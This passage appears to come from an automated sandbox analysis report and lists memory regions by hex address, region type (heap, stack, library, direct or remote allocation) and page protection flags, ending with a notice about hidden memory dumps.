trusted library allocation
page execute and read and write
385A000
heap
page read and write
44BA000
heap
page read and write
1CA5F000
stack
page read and write
1DBF000
stack
page read and write
140000
heap
page read and write
1B40000
trusted library allocation
page read and write
320000
heap
page read and write
39B000
heap
page read and write
36EA000
heap
page read and write
1C10000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
135CD000
trusted library allocation
page read and write
274D000
trusted library allocation
page read and write
409000
heap
page read and write
3E3B000
trusted library allocation
page read and write
360000
heap
page read and write
21C0000
heap
page read and write
2760000
trusted library allocation
page read and write
288000
heap
page read and write
41B000
system
page execute and read and write
1AB9C000
heap
page read and write
3E3B000
trusted library allocation
page read and write
4E65000
heap
page read and write
4CF000
direct allocation
page read and write
525000
heap
page read and write
3831000
heap
page read and write
10000
heap
page read and write
4527000
heap
page read and write
1AA0B000
heap
page read and write
2B6000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
228000
stack
page read and write
1F16000
heap
page read and write
4AA000
heap
page read and write
2F5000
heap
page read and write
1FA4000
heap
page read and write
1C329000
heap
page read and write
1E13000
direct allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
1C165000
heap
page read and write
14A000
heap
page read and write
196000
heap
page read and write
7FE89C20000
trusted library allocation
page read and write
3298000
trusted library allocation
page read and write
A26000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
301000
heap
page read and write
1B06E000
stack
page read and write
479000
heap
page read and write
1AE4E000
stack
page read and write
3812000
heap
page read and write
7FE89A32000
trusted library allocation
page read and write
1C182000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
454D000
heap
page read and write
123F1000
trusted library allocation
page read and write
4BE2000
heap
page read and write
1BF2F000
stack
page read and write
7FE89990000
trusted library allocation
page execute and read and write
32A7000
trusted library allocation
page read and write
334E000
stack
page read and write
3A00000
trusted library allocation
page read and write
1B00000
trusted library allocation
page read and write
3670000
heap
page read and write
454A000
heap
page read and write
1283E000
trusted library allocation
page read and write
1A519000
stack
page read and write
3028000
trusted library allocation
page read and write
3A6000
heap
page read and write
2140000
heap
page read and write
25D000
heap
page read and write
2D9A000
stack
page read and write
7FE8986B000
trusted library allocation
page read and write
4545000
heap
page read and write
44BA000
heap
page read and write
3FE000
heap
page read and write
C7E000
stack
page read and write
1A7F0000
heap
page execute and read and write
122A1000
trusted library allocation
page read and write
4805000
heap
page read and write
5179000
heap
page read and write
1BD0000
heap
page read and write
4E5000
heap
page read and write
1C09E000
stack
page read and write
24F000
heap
page read and write
2C89000
trusted library allocation
page read and write
7FE89A20000
trusted library allocation
page execute and read and write
454A000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
C3000
stack
page read and write
33F000
heap
page read and write
461D000
heap
page read and write
1AF0E000
stack
page read and write
7FE89AF0000
trusted library allocation
page read and write
1B9000
heap
page read and write
12A2E000
trusted library allocation
page read and write
1DD0000
direct allocation
page read and write
480F000
heap
page read and write
20C000
stack
page read and write
4AB000
heap
page read and write
3E3D000
stack
page read and write
1B026000
heap
page read and write
4651000
heap
page read and write
3EB0000
heap
page read and write
3670000
heap
page read and write
480F000
heap
page read and write
34C000
stack
page read and write
7FE8990C000
trusted library allocation
page execute and read and write
250E000
stack
page read and write
7FE89853000
trusted library allocation
page execute and read and write
488000
heap
page read and write
2C1000
heap
page read and write
3853000
heap
page read and write
2FA000
heap
page read and write
2C2E000
trusted library allocation
page read and write
3497000
trusted library allocation
page read and write
2F0000
heap
page read and write
1A4E0000
heap
page execute and read and write
280000
heap
page read and write
12BCD000
trusted library allocation
page read and write
1A8A2000
heap
page read and write
32A2000
trusted library allocation
page read and write
39F9000
trusted library allocation
page read and write
420F000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
1C130000
heap
page read and write
92E000
heap
page read and write
145000
stack
page read and write
32AB000
trusted library allocation
page read and write
300B000
trusted library allocation
page read and write
12556000
trusted library allocation
page read and write
7FE89B6D000
trusted library allocation
page read and write
B40000
heap
page read and write
1D70000
trusted library allocation
page read and write
4533000
heap
page read and write
7FE89854000
trusted library allocation
page read and write
3830000
heap
page read and write
280000
heap
page read and write
12421000
trusted library allocation
page read and write
1AECB000
stack
page read and write
422000
heap
page read and write
12370000
trusted library allocation
page read and write
10016000
direct allocation
page execute and read and write
4350000
heap
page read and write
1C0FB000
heap
page read and write
4700000
heap
page read and write
1A0000
heap
page read and write
2FDE000
stack
page read and write
1AC74000
heap
page read and write
49A0000
heap
page read and write
36C000
stack
page read and write
3497000
trusted library allocation
page read and write
887000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
49B000
heap
page read and write
4BD5000
heap
page read and write
30A6000
trusted library allocation
page read and write
3735000
heap
page read and write
710000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
419000
heap
page read and write
2320000
heap
page execute and read and write
31A000
heap
page read and write
26E000
heap
page read and write
1C20B000
heap
page read and write
1A5F8000
heap
page execute and read and write
374F000
stack
page read and write
1ABB4000
heap
page read and write
4BE5000
heap
page read and write
E9F000
stack
page read and write
3497000
trusted library allocation
page read and write
490000
heap
page read and write
32AC000
trusted library allocation
page read and write
329A000
trusted library allocation
page read and write
44BB000
heap
page read and write
7FE89B93000
trusted library allocation
page read and write
3B0000
heap
page read and write
290A000
trusted library allocation
page read and write
268E000
stack
page read and write
4545000
heap
page read and write
7FE898F6000
trusted library allocation
page read and write
37B000
heap
page read and write
284000
heap
page read and write
1A6000
heap
page read and write
1AC8E000
heap
page read and write
426000
heap
page read and write
1AB93000
heap
page read and write
37B0000
heap
page read and write
1A8BC000
heap
page read and write
358000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
3298000
trusted library allocation
page read and write
1DD0000
heap
page read and write
48A1000
heap
page read and write
7FE89926000
trusted library allocation
page execute and read and write
2A0000
heap
page read and write
4610000
heap
page read and write
3F1000
heap
page read and write
133000
stack
page read and write
7FE89A54000
trusted library allocation
page read and write
2C8D000
trusted library allocation
page read and write
50B000
heap
page read and write
7FE89A32000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
25B000
heap
page read and write
7FE8986D000
trusted library allocation
page execute and read and write
EC000
stack
page read and write
471000
remote allocation
page execute and read and write
363000
heap
page read and write
1E07000
direct allocation
page read and write
2B8000
heap
page read and write
3370000
trusted library allocation
page execute
4A9000
heap
page read and write
214000
heap
page read and write
386F000
heap
page read and write
1C5D3000
heap
page read and write
440000
heap
page read and write
3C6000
heap
page read and write
200000
heap
page read and write
24F3000
trusted library allocation
page read and write
258000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
7FE899FC000
trusted library allocation
page read and write
482000
heap
page read and write
1ACD9000
heap
page read and write
291000
heap
page read and write
3E6000
heap
page read and write
1AF40000
heap
page read and write
1A934000
heap
page read and write
1C46F000
stack
page read and write
10000
heap
page read and write
3E3B000
trusted library allocation
page read and write
20000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
2E08000
trusted library allocation
page read and write
2A9E000
stack
page read and write
7FE89B30000
trusted library allocation
page read and write
236E000
trusted library allocation
page read and write
1A4FD000
stack
page read and write
24F000
heap
page read and write
1A658000
heap
page execute and read and write
1C1FF000
stack
page read and write
36E8000
heap
page read and write
2420000
trusted library allocation
page read and write
3A05000
trusted library allocation
page read and write
40D000
heap
page read and write
452B000
heap
page read and write
3F1000
heap
page read and write
20000
heap
page read and write
46C4000
heap
page read and write
4B0000
direct allocation
page read and write
4618000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
2160000
trusted library allocation
page read and write
22D0000
heap
page read and write
4637000
heap
page read and write
2040000
heap
page execute and read and write
1AC37000
heap
page read and write
1DD0000
heap
page execute and read and write
3CBA000
stack
page read and write
2C8D000
trusted library allocation
page read and write
1C2DE000
heap
page read and write
3120000
heap
page read and write
512000
heap
page read and write
3A8000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
1DE3000
direct allocation
page read and write
3A05000
trusted library allocation
page read and write
39B000
heap
page read and write
30D2000
trusted library allocation
page read and write
491000
heap
page read and write
4414000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
479D000
heap
page read and write
3A9000
heap
page read and write
12321000
trusted library allocation
page read and write
28A2000
trusted library allocation
page read and write
1C1AB000
heap
page read and write
7FE89A54000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
7D5000
heap
page read and write
33C000
heap
page read and write
1BC6000
heap
page read and write
3497000
trusted library allocation
page read and write
4533000
heap
page read and write
195000
stack
page read and write
B5D000
heap
page read and write
2C92000
trusted library allocation
page read and write
3A00000
trusted library allocation
page read and write
1FA0000
heap
page read and write
7FE89906000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
46C4000
heap
page read and write
332000
stack
page read and write
1AC0D000
heap
page read and write
3836000
heap
page read and write
7FE89A74000
trusted library allocation
page read and write
4545000
heap
page read and write
364E000
heap
page read and write
279F000
stack
page read and write
309000
heap
page read and write
12361000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
3856000
heap
page read and write
1C2AE000
stack
page read and write
1A81E000
heap
page execute and read and write
1B90000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
7FE898AC000
trusted library allocation
page execute and read and write
1FAF000
stack
page read and write
320000
heap
page read and write
3497000
trusted library allocation
page read and write
1A917000
heap
page read and write
B36000
heap
page read and write
2EE000
heap
page read and write
2426000
trusted library allocation
page read and write
39B0000
trusted library allocation
page read and write
2EA000
heap
page read and write
426000
heap
page read and write
3E3B000
trusted library allocation
page read and write
7FE8987D000
trusted library allocation
page execute and read and write
7FE89B59000
trusted library allocation
page read and write
1C12E000
stack
page read and write
1C5EC000
stack
page read and write
7FE8988B000
trusted library allocation
page read and write
3C2000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
145000
stack
page read and write
3FE000
heap
page read and write
4537000
heap
page read and write
4BEA000
heap
page read and write
7FE899F2000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
9FE000
stack
page read and write
7FE8992C000
trusted library allocation
page execute and read and write
33F000
heap
page read and write
2C83000
trusted library allocation
page read and write
1A650000
heap
page execute and read and write
1A569000
heap
page read and write
1DD8000
heap
page read and write
39F000
heap
page read and write
22F000
heap
page read and write
4C0000
heap
page read and write
48BB000
heap
page read and write
26C000
heap
page read and write
47A2000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
1CE0000
direct allocation
page read and write
39F000
heap
page read and write
476000
heap
page read and write
454D000
heap
page read and write
1ABD4000
heap
page read and write
454A000
heap
page read and write
276D000
trusted library allocation
page read and write
7FE89873000
trusted library allocation
page read and write
1C27F000
stack
page read and write
382C000
heap
page read and write
1CC0000
direct allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
461E000
heap
page read and write
65B000
heap
page read and write
1C2F7000
heap
page read and write
463C000
heap
page read and write
3003000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
454D000
heap
page read and write
3858000
heap
page read and write
1C1B2000
heap
page read and write
34B0000
trusted library allocation
page read and write
1E07000
direct allocation
page read and write
7FE89B65000
trusted library allocation
page read and write
7FE89A58000
trusted library allocation
page read and write
36EF000
heap
page read and write
1AC05000
heap
page read and write
3A00000
trusted library allocation
page read and write
1B270000
heap
page read and write
408000
heap
page read and write
3E3B000
trusted library allocation
page read and write
4543000
heap
page read and write
7FE89926000
trusted library allocation
page read and write
45B000
heap
page read and write
1C2B0000
heap
page read and write
1E0000
trusted library allocation
page read and write
20000
heap
page read and write
7FE89854000
trusted library allocation
page read and write
27A3000
trusted library allocation
page read and write
4EF000
heap
page read and write
1B40000
heap
page read and write
288000
heap
page read and write
1B8000
heap
page read and write
1A8B9000
stack
page read and write
24C000
heap
page read and write
2FD000
heap
page read and write
434000
heap
page read and write
540000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
51C000
heap
page read and write
259000
heap
page read and write
406000
heap
page read and write
7FE89A78000
trusted library allocation
page read and write
7FE89920000
trusted library allocation
page read and write
3F4000
heap
page read and write
1BF60000
heap
page read and write
2E02000
trusted library allocation
page read and write
28C000
heap
page read and write
C80000
heap
page read and write
48BF000
heap
page read and write
2E0000
trusted library allocation
page read and write
3E3B000
trusted library allocation
page read and write
2F5000
heap
page read and write
1C0C0000
heap
page read and write
4A00000
heap
page read and write
1A5FF000
stack
page read and write
9C0000
heap
page read and write
2C56000
trusted library allocation
page read and write
3618000
heap
page read and write
51C000
heap
page read and write
3FDF000
stack
page read and write
431000
heap
page read and write
40F000
heap
page read and write
1D24000
heap
page read and write
1ABCB000
heap
page read and write
3A8000
heap
page read and write
4BE8000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
B4000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1AFD0000
heap
page read and write
1C1000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
41C000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
1F6000
heap
page read and write
1FE000
heap
page read and write
2D0000
trusted library allocation
page read and write
158000
stack
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
2C89000
trusted library allocation
page read and write
3A4000
heap
page read and write
7FE89B65000
trusted library allocation
page read and write
2930000
trusted library allocation
page read and write
4AB000
heap
page read and write
4A3A000
heap
page read and write
2E9000
heap
page read and write
3497000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
37B1000
heap
page read and write
1E60000
heap
page read and write
3929000
trusted library allocation
page read and write
25F000
heap
page read and write
3A7E000
stack
page read and write
350000
direct allocation
page read and write
1B5C0000
heap
page read and write
7FE89853000
trusted library allocation
page execute and read and write
419000
heap
page read and write
3D7000
heap
page read and write
1B0F4000
heap
page read and write
1A7F4000
heap
page execute and read and write
379000
heap
page read and write
272E000
trusted library allocation
page read and write
38E000
stack
page read and write
3734000
heap
page read and write
3E3B000
trusted library allocation
page read and write
1C234000
heap
page read and write
1C294000
heap
page read and write
1CBB000
direct allocation
page read and write
234E000
trusted library allocation
page read and write
1C65000
heap
page read and write
1AB63000
heap
page read and write
4D0000
direct allocation
page read and write
3689000
heap
page read and write
7FE89A10000
trusted library allocation
page execute and read and write
3D8000
heap
page read and write
7FE89BCD000
trusted library allocation
page read and write
1B07F000
stack
page read and write
26E2000
trusted library allocation
page read and write
1A47F000
stack
page read and write
7FE89873000
trusted library allocation
page execute and read and write
7FE89842000
trusted library allocation
page read and write
382D000
heap
page read and write
10000
heap
page read and write
1C06000
heap
page read and write
34E000
heap
page read and write
1A83E000
stack
page read and write
3F2000
heap
page read and write
1C340000
heap
page read and write
278000
heap
page read and write
430000
heap
page read and write
1A564000
heap
page read and write
329A000
trusted library allocation
page read and write
358000
heap
page read and write
1C0C5000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
382000
heap
page read and write
4F0000
heap
page read and write
39D0000
trusted library allocation
page read and write
CD2000
heap
page read and write
130000
heap
page read and write
423000
heap
page read and write
1AAEB000
heap
page read and write
30D000
stack
page read and write
37D8000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
36EE000
heap
page read and write
41E000
heap
page read and write
12AEE000
trusted library allocation
page read and write
2EF000
heap
page read and write
48BB000
heap
page read and write
3851000
heap
page read and write
3845000
heap
page read and write
4AE000
heap
page read and write
130000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
3940000
trusted library allocation
page read and write
2B8000
heap
page read and write
1EE0000
heap
page read and write
2FE000
heap
page read and write
478000
remote allocation
page execute and read and write
12A0E000
trusted library allocation
page read and write
36EB000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
334000
stack
page read and write
7FE89A13000
trusted library allocation
page read and write
2F5000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3F8000
heap
page read and write
3B0000
heap
page read and write
1AFFF000
stack
page read and write
358000
heap
page read and write
1C00E000
stack
page read and write
7FE89A90000
trusted library allocation
page read and write
422000
heap
page read and write
1E10000
heap
page read and write
4680000
heap
page read and write
376F000
stack
page read and write
7FE899E0000
trusted library allocation
page read and write
1AFDB000
stack
page read and write
1B19E000
stack
page read and write
1C200000
heap
page read and write
1AED8000
heap
page read and write
48E000
stack
page read and write
337000
heap
page read and write
3C7000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
3007000
trusted library allocation
page read and write
7FE89BC6000
trusted library allocation
page read and write
10000
heap
page read and write
640000
heap
page read and write
3D7000
heap
page read and write
320000
heap
page read and write
3B0000
heap
page read and write
32F000
stack
page read and write
32A4000
trusted library allocation
page read and write
32AD000
trusted library allocation
page read and write
51D000
heap
page read and write
4BDC000
heap
page read and write
356000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
2C81000
trusted library allocation
page read and write
7FE89A12000
trusted library allocation
page read and write
1AFF0000
heap
page read and write
45D000
system
page execute and read and write
1C15000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
48BC000
heap
page read and write
7FE89900000
trusted library allocation
page read and write
35EC000
stack
page read and write
4680000
heap
page read and write
410000
heap
page read and write
3831000
heap
page read and write
174000
heap
page read and write
1A5F0000
heap
page execute and read and write
316000
stack
page read and write
7FE89BC0000
trusted library allocation
page read and write
1A9D0000
heap
page read and write
38FE000
stack
page read and write
29E8000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
46C4000
heap
page read and write
32AA000
trusted library allocation
page read and write
2A0000
heap
page read and write
3FB000
heap
page read and write
3DC000
heap
page read and write
1C1AD000
heap
page read and write
2E0000
heap
page read and write
4545000
heap
page read and write
7FE89A22000
trusted library allocation
page read and write
180000
heap
page read and write
1A7A6000
heap
page read and write
515000
heap
page read and write
25E000
heap
page read and write
1C100000
heap
page read and write
4C7000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
25E000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
40F000
heap
page read and write
3BE000
heap
page read and write
1AA89000
stack
page read and write
2C8E000
trusted library allocation
page read and write
1CC6E000
stack
page read and write
366E000
heap
page read and write
1D20000
heap
page read and write
454F000
heap
page read and write
1E00000
direct allocation
page read and write
418000
heap
page read and write
3AA000
heap
page read and write
37E6000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
8AC000
heap
page read and write
540000
heap
page read and write
299D000
stack
page read and write
7FE89A52000
trusted library allocation
page read and write
10000
heap
page read and write
8BB000
heap
page read and write
4630000
heap
page read and write
3858000
heap
page read and write
426000
heap
page read and write
20F000
heap
page read and write
1C0D5000
heap
page read and write
21AF000
stack
page read and write
3670000
heap
page read and write
36EA000
heap
page read and write
37D000
heap
page read and write
3624000
heap
page read and write
125A1000
trusted library allocation
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
7FE89900000
trusted library allocation
page read and write
1CBB0000
heap
page read and write
1B22B000
stack
page read and write
7FE899F3000
trusted library allocation
page read and write
7FE89C30000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
32B0000
heap
page read and write
385A000
heap
page read and write
7FE89872000
trusted library allocation
page read and write
2D2000
heap
page read and write
3670000
heap
page read and write
1C0000
heap
page read and write
32A3000
trusted library allocation
page read and write
7FE89C70000
trusted library allocation
page read and write
348000
stack
page read and write
240000
heap
page read and write
435000
heap
page read and write
4A3A000
heap
page read and write
4680000
heap
page read and write
1FB0000
heap
page read and write
1D30000
heap
page read and write
488000
heap
page read and write
338000
heap
page read and write
2C2000
heap
page read and write
3AE000
heap
page read and write
A86000
heap
page read and write
2EE000
heap
page read and write
37D8000
heap
page read and write
7FE89844000
trusted library allocation
page read and write
1DD8000
heap
page execute and read and write
3520000
trusted library allocation
page read and write
3E3B000
trusted library allocation
page read and write
7FE89A03000
trusted library allocation
page read and write
1AC0F000
stack
page read and write
213000
heap
page read and write
4684000
heap
page read and write
1B34F000
stack
page read and write
4BEA000
heap
page read and write
1AB3F000
stack
page read and write
3F12000
heap
page read and write
179000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
10000
heap
page read and write
7FE89850000
trusted library allocation
page read and write
2BBE000
stack
page read and write
7FE89A58000
trusted library allocation
page read and write
32AA000
trusted library allocation
page read and write
3A00000
trusted library allocation
page read and write
319000
heap
page read and write
473A000
heap
page read and write
1C34F000
heap
page read and write
3770000
heap
page read and write
40C000
heap
page read and write
7FE89880000
trusted library allocation
page read and write
365A000
stack
page read and write
4680000
heap
page read and write
33A000
heap
page read and write
7FE898FC000
trusted library allocation
page execute and read and write
4D6000
heap
page read and write
4AF000
heap
page read and write
31E000
heap
page read and write
1CBF000
direct allocation
page read and write
3F6000
heap
page read and write
2DB0000
heap
page read and write
3618000
heap
page read and write
4D7000
heap
page read and write
1AC10000
heap
page read and write
43D000
heap
page read and write
A20000
heap
page read and write
522000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
53A000
heap
page read and write
37A8000
heap
page read and write
F0E000
stack
page read and write
1A78E000
heap
page read and write
EE000
heap
page read and write
3001000
trusted library allocation
page read and write
3198000
heap
page read and write
2A0000
heap
page read and write
36B1000
heap
page read and write
515000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
358000
heap
page read and write
378000
heap
page read and write
7FE89BFC000
trusted library allocation
page read and write
3E4000
heap
page read and write
2B0000
heap
page read and write
7EC000
heap
page read and write
1A888000
stack
page read and write
2361000
trusted library allocation
page read and write
2A19000
trusted library allocation
page read and write
CD9000
heap
page read and write
3497000
trusted library allocation
page read and write
389000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
41A000
heap
page read and write
10000
heap
page read and write
4BA0000
heap
page read and write
1B150000
heap
page read and write
3BBF000
stack
page read and write
229000
heap
page read and write
There are 2168 hidden memdumps, click here to show them.